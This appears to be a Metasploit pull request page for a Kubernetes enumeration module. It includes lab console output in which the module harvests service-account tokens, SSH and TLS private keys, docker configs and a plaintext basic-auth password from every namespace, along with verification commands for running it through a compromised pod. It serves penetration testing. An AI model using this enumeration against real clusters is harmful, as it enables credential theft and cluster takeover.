15 default tn2dn1iqs Running tag2ujl1h (image: kubernetesui/dashboard:v2.4.0) 172.17.0.2
16 default u1uubk1hx6 Running ykyijfc (image: kubernetesui/dashboard:v2.4.0) 172.17.0.3
17 default ui5wzz41j Running xad (image: busybox) 172.17.0.8
18 default ultumax92s Running x7drtuaz5apw (image: busybox) 172.17.0.19
19 default xfmln6v5ewg Running ffb (image: busybox) 172.17.0.22
20 default ydop9 Running p3ahr5o51 (image: kubernetesui/dashboard:v2.4.0) 172.17.0.6
Secrets (namespace: default)
============================
# namespace name type data age
- --------- ---- ---- ---- ---
0 default admin-sa-token-7s98l kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 default default-token-db22s kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 default kubernetes-dashboard-certs Opaque 21h
3 default kubernetes-dashboard-csrf Opaque csrf 21h
4 default kubernetes-dashboard-key-holder Opaque priv,pub 21h
5 default kubernetes-dashboard-token-h2p5h kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 default lucee-token-stpnz kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 default secrets-basic-auth kubernetes.io/basic-auth password,username 21h
8 default secrets-dockerconfigjson kubernetes.io/dockerconfigjson .dockerconfigjson 21h
9 default secrets-empty Opaque 21h
10 default secrets-id-ed25519-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
11 default secrets-id-ed25519-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
12 default secrets-id-rsa-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
13 default secrets-id-rsa-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
14 default secrets-tls kubernetes.io/tls tls.crt,tls.key 21h
15 default secrets-user-password Opaque password,username 21h
16 default sh.helm.release.v1.kubernetes-dashboard.v1 helm.sh/release.v1 release 21h
17 default sh.helm.release.v1.kubernetes-dashboard.v2 helm.sh/release.v1 release 21h
18 default sh.helm.release.v1.kubernetes-dashboard.v3 helm.sh/release.v1 release 19h
19 default sh.helm.release.v1.lucee.v1 helm.sh/release.v1 release 21h
20 default sh.helm.release.v1.secrets.v1 helm.sh/release.v1 release 21h
21 default sh.helm.release.v1.thinkphp.v1 helm.sh/release.v1 release 21h
22 default thinkphp-token-cml9b kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token admin-sa-token-7s98l: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_385248.json
[+] service token default-token-db22s: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_364014.json
[+] service token kubernetes-dashboard-token-h2p5h: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_521672.json
[+] service token lucee-token-stpnz: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_231726.json
[+] basic_auth secrets-basic-auth: root:password123
[+] dockerconfig json secrets-dockerconfigjson: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_docker.json_059484.json
[+] ssh_key secrets-id-ed25519-with-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_873214.txt
[+] ssh_key secrets-id-ed25519-without-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_940071.txt
[+] ssh_key secrets-id-rsa-with-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_746246.txt
[+] ssh_key secrets-id-rsa-without-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_865415.txt
[+] tls_key secrets-tls: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_tls.key_328155.txt
[+] tls_cert secrets-tls: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_tls.cert_564163.crt (/CN=example.com)
[+] service token thinkphp-token-cml9b: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_641336.json
[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-node-lease)
=================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-node-lease)
====================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-node-lease default-token-rr9hd kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-rr9hd: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_204461.json
[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-public)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-public)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-public default-token-jk68r kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-jk68r: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_784600.json
[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-system)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kube-system coredns-78fcd69978-9ktdz Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.4 UDP:53,TCP:53,TCP:9153) 172.17.0.14
1 kube-system etcd-minikube Running etcd (image: k8s.gcr.io/etcd:3.5.0-0) 192.168.49.2
2 kube-system kube-apiserver-minikube Running kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.22.1) 192.168.49.2
3 kube-system kube-controller-manager-minikube Running kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.22.1) 192.168.49.2
4 kube-system kube-proxy-dzpmf Running kube-proxy (image: k8s.gcr.io/kube-proxy:v1.22.1) 192.168.49.2
5 kube-system kube-scheduler-minikube Running kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.22.1) 192.168.49.2
6 kube-system storage-provisioner Running storage-provisioner (image: gcr.io/k8s-minikube/storage-provisioner:v5) 192.168.49.2
Secrets (namespace: kube-system)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-system attachdetach-controller-token-8dxjl kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 kube-system bootstrap-signer-token-wfvtd kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 kube-system bootstrap-token-bfr928 bootstrap.kubernetes.io/token auth-extra-groups,expiration,token-id,token-secret,usage-bootstrap-authentication,usage-bootstrap-signing 21h
3 kube-system certificate-controller-token-h6jbb kubernetes.io/service-account-token ca.crt,namespace,token 21h
4 kube-system clusterrole-aggregation-controller-token-jqvwq kubernetes.io/service-account-token ca.crt,namespace,token 21h
5 kube-system coredns-token-g7vl2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 kube-system cronjob-controller-token-z47mc kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 kube-system daemon-set-controller-token-687t9 kubernetes.io/service-account-token ca.crt,namespace,token 21h
8 kube-system default-token-vkz9f kubernetes.io/service-account-token ca.crt,namespace,token 21h
9 kube-system deployment-controller-token-pkx8p kubernetes.io/service-account-token ca.crt,namespace,token 21h
10 kube-system disruption-controller-token-89g95 kubernetes.io/service-account-token ca.crt,namespace,token 21h
11 kube-system endpoint-controller-token-r524w kubernetes.io/service-account-token ca.crt,namespace,token 21h
12 kube-system endpointslice-controller-token-vmm8h kubernetes.io/service-account-token ca.crt,namespace,token 21h
13 kube-system endpointslicemirroring-controller-token-t79hc kubernetes.io/service-account-token ca.crt,namespace,token 21h
14 kube-system ephemeral-volume-controller-token-gknzr kubernetes.io/service-account-token ca.crt,namespace,token 21h
15 kube-system expand-controller-token-b8mp4 kubernetes.io/service-account-token ca.crt,namespace,token 21h
16 kube-system generic-garbage-collector-token-5w2j5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
17 kube-system horizontal-pod-autoscaler-token-sjrxn kubernetes.io/service-account-token ca.crt,namespace,token 21h
18 kube-system job-controller-token-wn84n kubernetes.io/service-account-token ca.crt,namespace,token 21h
19 kube-system kube-proxy-token-7x5lg kubernetes.io/service-account-token ca.crt,namespace,token 21h
20 kube-system namespace-controller-token-9bb4x kubernetes.io/service-account-token ca.crt,namespace,token 21h
21 kube-system node-controller-token-l44n2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
22 kube-system persistent-volume-binder-token-nhpj2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
23 kube-system pod-garbage-collector-token-sfk5t kubernetes.io/service-account-token ca.crt,namespace,token 21h
24 kube-system pv-protection-controller-token-4mbl5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
25 kube-system pvc-protection-controller-token-htj54 kubernetes.io/service-account-token ca.crt,namespace,token 21h
26 kube-system replicaset-controller-token-fhd7g kubernetes.io/service-account-token ca.crt,namespace,token 21h
27 kube-system replication-controller-token-rw9sx kubernetes.io/service-account-token ca.crt,namespace,token 21h
28 kube-system resourcequota-controller-token-6p6n5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
29 kube-system root-ca-cert-publisher-token-ghc5g kubernetes.io/service-account-token ca.crt,namespace,token 21h
30 kube-system service-account-controller-token-s8kp5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
31 kube-system service-controller-token-lngkb kubernetes.io/service-account-token ca.crt,namespace,token 21h
32 kube-system statefulset-controller-token-bwlgx kubernetes.io/service-account-token ca.crt,namespace,token 21h
33 kube-system storage-provisioner-token-2gj94 kubernetes.io/service-account-token ca.crt,namespace,token 21h
34 kube-system token-cleaner-token-fwbmc kubernetes.io/service-account-token ca.crt,namespace,token 21h
35 kube-system ttl-after-finished-controller-token-jrfjc kubernetes.io/service-account-token ca.crt,namespace,token 21h
36 kube-system ttl-controller-token-nv9px kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token attachdetach-controller-token-8dxjl: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_672817.json
[+] service token bootstrap-signer-token-wfvtd: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_409785.json
[+] service token certificate-controller-token-h6jbb: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_105875.json
[+] service token clusterrole-aggregation-controller-token-jqvwq: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_407539.json
[+] service token coredns-token-g7vl2: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_197339.json
[+] service token cronjob-controller-token-z47mc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_001715.json
[+] service token daemon-set-controller-token-687t9: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_109824.json
[+] service token default-token-vkz9f: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_864341.json
[+] service token deployment-controller-token-pkx8p: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_882366.json
[+] service token disruption-controller-token-89g95: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_729155.json
[+] service token endpoint-controller-token-r524w: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_553175.json
[+] service token endpointslice-controller-token-vmm8h: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_531612.json
[+] service token endpointslicemirroring-controller-token-t79hc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_719909.json
[+] service token ephemeral-volume-controller-token-gknzr: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_299322.json
[+] service token expand-controller-token-b8mp4: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_625595.json
[+] service token generic-garbage-collector-token-5w2j5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_062775.json
[+] service token horizontal-pod-autoscaler-token-sjrxn: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_768626.json
[+] service token job-controller-token-wn84n: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_976515.json
[+] service token kube-proxy-token-7x5lg: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_473723.json
[+] service token namespace-controller-token-9bb4x: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_940487.json
[+] service token node-controller-token-l44n2: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_172853.json
[+] service token persistent-volume-binder-token-nhpj2: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_485217.json
[+] service token pod-garbage-collector-token-sfk5t: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_031269.json
[+] service token pv-protection-controller-token-4mbl5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_002130.json
[+] service token pvc-protection-controller-token-htj54: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_534652.json
[+] service token replicaset-controller-token-fhd7g: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_985201.json
[+] service token replication-controller-token-rw9sx: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_951165.json
[+] service token resourcequota-controller-token-6p6n5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_907963.json
[+] service token root-ca-cert-publisher-token-ghc5g: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_679333.json
[+] service token service-account-controller-token-s8kp5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_865252.json
[+] service token service-controller-token-lngkb: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_139882.json
[+] service token statefulset-controller-token-bwlgx: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_917405.json
[+] service token storage-provisioner-token-2gj94: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_951179.json
[+] service token token-cleaner-token-fwbmc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_377555.json
[+] service token ttl-after-finished-controller-token-jrfjc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_438999.json
[+] service token ttl-controller-token-nv9px: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_513477.json
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Action command w/JSON output
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > namespace OUTPUT=json
[*] Routing traffic through session: 2
[+] Kubernetes service host: 10.96.0.1:443
[
{
"metadata": {
"name": "default",
"uid": "d56f9f69-5445-4748-ab08-44c584c1168c",
"resourceVersion": "205",
"creationTimestamp": "2021-10-20T15:51:36Z",
"labels": {
"kubernetes.io/metadata.name": "default"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:36Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-node-lease",
"uid": "1ce005ce-6e7f-481b-ac87-c9e7d140e6a3",
"resourceVersion": "46",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-node-lease"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-public",
"uid": "5ba1b158-1529-4a03-b412-8ed587ca4e70",
"resourceVersion": "30",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-public"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-system",
"uid": "1073b6ff-fef7-4dcd-9e8a-1e1b2b374537",
"resourceVersion": "7",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-system"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
}
]
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Release NotesThis adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version. |
Note, this PR was additionally reviewed by @zeroSteiner in a separate pull request zeroSteiner#14
Adds support for a new Kubernetes enum module. Similar to #15733 - the user must have a Kubernetes JWT token, and access to the Kubernetes REST API through some means (either direct or through a compromised pod). A session on an existing pod can be used to configure a few options, including the JWT token and RHOST / RPORT options. Some changes were made to the RHOSTS and SESSION validation code to honor instances in which they are marked as optional. When defined, the validation still takes place either way, but when they are marked as optional and blank the validation is skipped to allow the module to run.
Verification
After setting up a Kubernetes cluster locally/remotely with #15773, the following scenarios should work.
Directly connecting to the Kubernetes API:
The following commands should work:
run
namespaces
namespaces name=kube-public
auth
auth output=json
secrets
pods
pod
pod namespace=default name=redis-7fd956df5-sbchb
pod namespace=default name=redis-7fd956df5-sbchb output=json
pod namespace=default name=redis-7fd956df5-sbchb output=table
version
As well as pivoting through a compromised container:
Additional context is in the module documentation, which is in the File Changed tab